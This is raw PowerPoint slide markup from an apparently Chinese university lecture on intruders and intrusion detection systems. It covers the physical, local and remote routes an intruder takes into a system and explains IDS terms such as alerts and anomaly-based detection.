        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5122" name="Rectangle 1026">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24399853-70FB-45F6-9EC2-CB4465CF3591}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1905000"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                <a:ea typeface="华文行楷" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>入侵者</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5123" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCDCB268-968E-4C4A-B099-B60E52C933DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2028825" y="5076825"/>
            <a:ext cx="55435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lIns="92075" tIns="46038" rIns="92075" bIns="46038"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
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>何高峰</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hegaofeng@njupt.edu.cn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F14C8F1-F6AB-4F8C-8C7D-7393618C6CB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、入侵系统的主要途径</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12291" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57AD1724-B0AB-4A20-A0C3-2B72D88443F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1676400"/>
            <a:ext cx="7772400" cy="4495800"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>入侵者进入系统的主要途径有：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>物理侵入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>指一个入侵者对主机有物理进入权限。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>本地侵入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这类侵入表现为入侵者已经拥有在系统用户的较低权限。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>远程侵入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>这类入侵指入侵者通过网络远程进入系统。</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12291">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:srgbClr val="C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A7DC6E4B-9C33-4BD7-B17C-D93AC34615E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>常用术语</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6" name="Text Box 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D6045C8-409C-46D6-8276-A140376674CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="9906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None/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134147" name="Text Box 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC6D0699-39CE-48A5-A66E-5AA21F3E71B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1042988" y="990600"/>
            <a:ext cx="6424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endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="FF6600"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134148" name="Text Box 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{180BC049-1047-45B8-8BA9-4C568AA379EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1187450" y="1052513"/>
            <a:ext cx="626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a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134149" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77C18C53-E032-461A-9CCF-8744D6DE1E11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="2362200"/>
            <a:ext cx="8077200" cy="342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lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>当一个入侵正在发生或者试图发生时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>系统将发布一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>信息通知系统管理员</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>如果控制台与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>系统同在一台机器，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>信息将显示在监视器上，也可能伴随着声音提示</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>如果是远程控制台，那么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>将通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>系统内置方法（通常是加密的）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>SNMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>（简单网络管理协议，通常不加密）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>SMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>（短信息）或者以上几种方法的混合方式传递给管理员</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134150" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA6CEDFD-3FE3-4D6B-ADF5-B9F2CC6DA0A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219200" y="9906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en-US" altLang="zh-CN" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（警报）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </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0" name="Text Box 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAB2B65F-A1DC-4E02-9CB4-2E59329BEF81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="9906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None/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135171" name="Text Box 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0CEBABA-BC98-4BCF-AC66-0410D3C97427}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1042988" y="990600"/>
            <a:ext cx="6424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endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="FF6600"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135172" name="Text Box 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60A3D798-97C5-4386-8D9E-16774F73A075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1187450" y="1052513"/>
            <a:ext cx="626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a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135173" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B95309F-1622-4EA1-8EA1-3D94B5064BF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219200" y="9906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en-US" altLang="zh-CN" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anomaly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（异常） </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135174" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D63140B-FCC9-4210-BA99-77B3151E81F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="2209800"/>
            <a:ext cx="76962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当有某个事件与一个已知攻击的信号相匹配时，多数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>都会告警</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>一个基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>anomaly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>（异常）的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>会构造一个当时活动的主机或网络的大致轮廓，当有一个在这个轮廓以外的事件发生时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>就会告警</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>有些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>厂商将此方法看做启发式功能，但一个启发式的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>应该在其推理判断方面具有更多的智能 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRP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4" name="Text Box 1026">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{074EE5CB-1430-49E8-9AB9-2F99610160ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="9906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None/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136195" name="Text Box 1027">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49D74655-6BDB-464E-A523-D0DFB9EBDC2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1042988" y="990600"/>
            <a:ext cx="6424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endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="FF6600"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136196" name="Text Box 1028">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
